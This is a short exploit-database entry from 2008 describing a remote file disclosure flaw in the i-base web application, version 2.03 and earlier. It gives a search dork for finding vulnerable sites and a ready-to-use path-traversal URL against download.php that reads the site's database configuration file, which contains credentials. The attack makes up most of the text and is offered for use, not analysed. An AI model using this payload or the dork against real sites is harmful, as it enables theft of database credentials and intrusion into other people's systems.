id: 3443
date: 07/23/2008
title: ibase <= 2.03 (download.php) Remote File Disclosure Vulnerability
author: Dyshoo
cves: 

=================================================================
ibase <= 2.03 (download.php) Remote File Disclosure Vulnerability
=================================================================



Name: [AFD] i-base <= 2.03
Author: Dyshoo
Vendor: http://www.i-base.net/
Dork: "inurl:ibase site:de"

http://[site]/ibase/zubehoer/download.php?filename=[file]

Database config:
http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php



#  0day.today [2023-03-27]  #